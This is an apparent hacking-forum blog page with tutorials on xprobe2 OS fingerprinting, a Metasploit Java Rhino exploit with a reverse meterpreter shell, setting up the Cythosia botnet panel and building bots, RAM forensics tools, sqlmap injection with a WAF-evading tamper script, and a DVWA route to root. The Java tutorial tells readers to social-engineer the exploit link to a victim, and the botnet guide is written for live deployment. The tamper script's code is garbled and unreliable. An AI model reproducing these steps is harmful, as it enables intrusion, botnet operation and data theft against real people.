Chennai Hackers Connect (CHC): tutorials

Showing posts with label tutorials. Show all posts

Banner Grabbing - Backtrack

2:21 am

backtrack, tutorials

2 comments

Banner Grabbing - OS Detection

OS Fingerprinting

After we know that the target machine is live, we can then find out the operating system used by the target machine. This method is commonly known as Operating System (OS) fingerprinting.So today i will teach you how you can find which operating system your target is using.

XPROBE 2

xprobe2 is an OS fingerprinting tool. It fingerprints operating systems by using fuzzy signature matching, probabilistic guesses, multiple matches simultaneously, and a signature database. You need to run xprobe2 with root privileges as the xprobe2 uses a raw socket to send the probes.To access xprobe2:-

1. root@root# xprobe

//run it in ur console and it will open the xprobe usage on ur shell and u can also see which version ur using backtrack 5 r1 is using xprobe2////

Currently, xprobe2 has the following modules:

• icmp_ping: ICMP echo discovery module

• tcp_ping: TCP-based ping discovery module

• udp_ping: UDP-based ping discovery module

• ttl_calc: TCP and UDP based TTL distance calculation

• portscan: TCP and UDP PortScanner

• icmp_echo: ICMP echo request fingerprinting module

• icmp_tstamp: ICMP timestamp request fingerprinting module

• icmp_amask: ICMP address mask request fingerprinting module

• icmp_port_unreach: ICMP port unreachable fingerprinting module

• tcp_hshake: TCP Handshake fingerprinting module

• tcp_rst: TCP RST fingerprinting module

• smb: SMB fingerprinting module

• snmp: SNMPv2c fingerprinting module

For fingerprinting a remote machine, you can just call xprobe2 and give the remote machine IP address or hostname as the argument:

2. root@root# xprobe2 192.168.1.4

5:11 pm

backtrack, tutorials

0 comments

Browser Java Rhino exploit Tutorial

we are going to pwn windows 7 with a java exploit called: JAVA RHINO Exploit. Here i quote from the Armitage console's description of the exploit:" This module exploits a vulnerability in the Rhino Script Engine that can be used by Java Applet to run an arbitrary code outside of the sandbox" The vulnerability affects version 7 and earlier versions, and should work on any browser: firefox, safari, internet explorer, google chrome etc...
First of all, you have to update the metasploit svn by the custom command #msfupdate , to make sure that the above exploit is included in your Backtrack exploits database. Then run:

#msfconsole

Then use this exploit:

#use exploit/multi/browser/java_rhino

Next set payload:

#set payload/java/meterpreter/reverse/tcp

backtrack, hacking, windows, metasploit, firefox, penetration testing

At this level, type these commands, the first one is meant to set up the server:

#set srvhost 192.168.1.6

In this case: 192.168.1.6 is my internal ip, you have to change this value with your own ip. If you don't know how to get your ip address, just open a ternimal and type: #ifconfig.The next command will define the port of the server which is usually port 80.

#set srvport 80

Next command is for setting up the path of the exploit:

#set uripath java_rhino

# set lhost 192.168.1.6

#set lport 443

Notice also that the srvhost & the lhost have the same ip address. Finally, type this command and wait for a connection:

#exploit

A link has been generated : Local IP://192.168.1.6:80/java_rhino, you have to copy the link and send it to your victim. Once you succeed in "social engineering" the link to a victim, the sending stage starts, and you'll have a java meterpreter session.

A meterpreter session will be created.
That's it Windows 7 is pwned =)

3:35 pm

hacking tools, tutorials

2 comments

Tutorial to install cythosia Bot

Requirements:
- Cythosia bot,
- A web host on http://www.000webhost.com/ or any other web host but this one is for free.

First Step:
Login into your webhost account or register and get into your web host. The website takes you to a page where you have": List of your domains."
Click on go to cPanel of the domain you've just made.

Second Step:
Scroll down the new page that is open and click on "File Manager" in the " Files" section.
note: If the site asks for a login, enter the password of your account.
Having a new page open, Open the document called " public_html",
There, Click the upload button,
You'll be redirected to a page where is:
Files
Files entered here will be transferred to the FTP server.
And
Archives (zip, tar, tgz, gz)
Archives entered here will be decompressed, and the files inside will be transferred to the FTP server.
- Under the archives section, click " Choose File". and choose the " webPanel zip archive that just came after you've extracted the download one. After that click the "Check" above the : "Upload to directory" and wait a few seconds.

Third Step:
Return back to the first page of the File manager.
Now to configure the files you've just uploaded so the bot could work, you have to enter the webpanel folder on your webhost and click on Chmod after selecting all the files in it. You get redirected to : "Chmod directories and files" there change the Chmod value of the files to 777 and click the Check mark button.

Forth step:
Now you can exit the window your are in, and return to the members area: " Cpanel". There scroll down until you see : "» Software / Services", inside that section, click the one named after " MySQL ".
Create a new database with the username, database name and password you want, but keep them in your mind or save them somewhere.

Fifth Step:
Return back to the CPanel and click the " phpMyAdmin " in the same section as of the MySQL one. Press Enter phpMyAdmin to the database you've just created. A new window will open, in the one that just opened click, Import, the file that we must choose is the one named dump which is located in the Webpanel folder that you've extracted also in the beginning, select it and press " GO ". After doing that, you can now close that window.

Sixth Step:
Get Back to the Cpanel and press file manager again, Navigate to:
/public_html/Botnet/Webpanel/admin/inc
And Edit the config.php file, Edit it with the details of the Mysql Database, username and password you've just created.
Finally, save the file and exit the window.

Seventh Step:
Enter the domain of your webhost, you'll get to put a password, Type in " admin ".

*Creating a bot:
To create your bot just Open " CythBuilder " and change the " Domain " thing to your domain. After that you can change " 1.0.6 [beta] [23-03-2011]" to a name of your choice. And the " Drop Name.exe " to the file name you want to appear.

Extract the file you just downloaded to your desktop.

Download here

10:47 am

backtrack, tutorials

0 comments

RAM FORENSICS TOOLS IN BACKTRACK

pdfbook.py

pdfbook.py is a utility that gathers information relating to Facebook from a process dump. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > fbookstrings”. Finally, we use pdfbook.py on the fbookstrings file resulting from the strings command.
Example Usage:pdfbook.py -f fbookstrings

pdgmail

pdgmail.py is a utility similar to pdfbook.py, but instead of gathering Facebook information from process dumps, it gathers Gmail information. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > gmailstrings”. Finally, we use pdgmail.py on the gmailstrings file resulting from the strings command.

Example Usage:pdgmail.py -f gmailstrings

PTK

PTK is a forensics toolkit, similar to the Sleuthkit toolkit. It contains built in modules in order to analyze nearly any type of media or filetype that may be encountered in a forensics investigation. It is browser based, and first needs to have a MySQL database configured. Leave all fields as default, and use the password “toor” for the root user in MySQL. It should setup successfully, at which point you need to register for the free version. Copy the license file you received into the config directory for PTK located at /var/www/ptk/config.

Next, log in as either admin or investigator, and open a new case. Fill out the necessary information, then add an image file to begin. It can even be a RAM dump. From here, the built in tools will help you pull information from the image(s).

Volatility

Volatility is a framework writen in Python that specializes in RAM analysis. The Volatility Framework can analyze volatile memory dumps from any system type, and can provide a deep insight into the state of the system while it was running. The Volatility Framework has been tested on Windows, OS X, Linux, and even Cygwin. In the example below, we use Volatility in order to list processes that were running on the system while the RAM image ram.img was taken.

Example Usage:volatility plist -f ram.img

11:11 pm

tutorials, website hacking

1 comments

Advance Sqlmap tutorial

1.... When you have the target URL but you are not sure if any of the parameter in that request is vulnerable then sqlmap can act as scanner in that case. The syntax for the GET request is as follow ./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy" The syntax for the POST request is as follow
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" This will tell you whether any of the variable viz. id, text is vulnerable to sql injection or not.Note: Through out this tutorial we will take POST request as an example. The only difference in the syntax of GET and POST request is that POST request has an additional switch (--data) which has your post parameters and their values.

2.... When you doubt that a particular parameter might be vulnerable to sql injection then you can specify that parameter with -p switch. The syntax is as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" sqlmap will try to check if parameter "id" is injectable or not.

3.... If the instance described in the last scenarios (i.e. 1, 2) is only available after user authenticates with the application then the steps would be as follows,a) Login into your application.b) Note down all the cookie names and its values. Let us assume that the cookies generated are cookie1=dummy_val1, cookie2=dummy_val2.c) Use sqlmap --cookie switch to replay these cookies along with the sqlmap requests.So the syntax will be as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"

4.... To get the value of the backend database such as version name, current database name and database user, the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user

5.... To get the tables of dummydb database , the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"

6.... To get the columns of admin table, the syntax will be ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"

7.... When you know the backend database provider such as mssql, mysql, oracle, etc. then you can specify it with the --dbms switch. This will tell sqlmap to not to try queries related to other databases and in turn can speed up the injection process.
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"

8.... If the application is protected by web application firewall (w.a.f) then you can try various tamper scripts to bypass w.a.f detection. There are almost 30 such tamper scripts available. To specify one such tamper scripts, you can use --tamper switch. The syntax is ./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py" All the available tamper scripts can be found under the tamper directory inside sqlmap root directory.

9.... Writing your own Tamper script.There are certain cases when application has very weak detection signature but none of the tamper script can do the job. For example, if the application code detects "UNION SELECT" but not "UNION SELEcT" then sqlmap will not be able to injectthat target as all the payloads of sqlmap will be like "UNION ALL SELECT", "WAITFOR DELAY", etc.So let us create our own tamper script. The format of any tamper script will be as follow

# Needed imports
from lib.core.enums import PRIORITY

#Define which is the order of application of tamper scripts against the payload

__priority__ = PRIORITY.NORMAL

def tamper(payload):

'''
 Description of your tamper script

''' Description of your tamper script ''' Description of your tamper script '''

retVal = payload

# your code to tamper the original payload # return the tampered payload 

return retVal

Based on the above tamper script format, our script will be

#!/usr/bin/env python
"""
Sample script by oldmanlab.
Email : oldmanlab@gmail.com
"""
from lib.core.enums import PRIORITY __priority____priority__ = PRIORITY.NORMAL
def tamper(payload):
""" INPUT : UNION ALL SELECT OUTPUT : UNION ALL SELEcT TESTED AGAINST: mysql 5.x.x """
INPUT : UNION ALL SELECT
OUTPUT : UNION ALL SELECT
TESTED AGAINST: mysql 5.x.x
"""
if payload:
retVal="" i=0 for i in xrange(len(payload)):
if payload[i:i+10] == "ALL SELECT":
retVal +="ALL SELEcT" + payload[i+10:]
break
else: retval += payload[i]
return retVal

8:00 pm

tutorials, website hacking

0 comments

Web Application Hacking

In this post, I'll try to show how to gain a root access through a web application. There are a lot of method to do that, this is one of them. The web application that will be used is DVWA(Damn Vulnerable Web Application). You can download it here. The installation is there too.

- Start up your apache and mysql.

- Open dvwa in browser.

- Login with username : admin and password : password.

- DVWA main page.

- The vulnerability that I'll use to gain root access from this web is through its "command execution" vulnerability because in a web, this is the most dangerous feature to have. Hacker can get a shell without having to place a backdoor inside the server.

- Set the security level to medium. (because 'low' would be too easy and 'hard' would be too difficult.. :P )

- Lets try to do a normal command.

- Next, lets execute multiple command.

- Lets try to use pipe "|".

- Looking good. Now, lets begin the attack. >:)

- I'll use a local exploit on the system to gain the root access. Before searching the exploit, lets see what version of kernel the system running.

- Search the exploitdb for the local exploit. Using keyword "2.6.39" I found this exploit created by zx2c4 coded in C language.

- After download the exploit, lets compile it first before transferring it to the target. Original Exploit code here.

- Exploit ready to be used.

- Now lets try to upload it using "File Upload" on dvwa. Before doing that, I'll increase dvwa security into High level because it is a rule in my training center.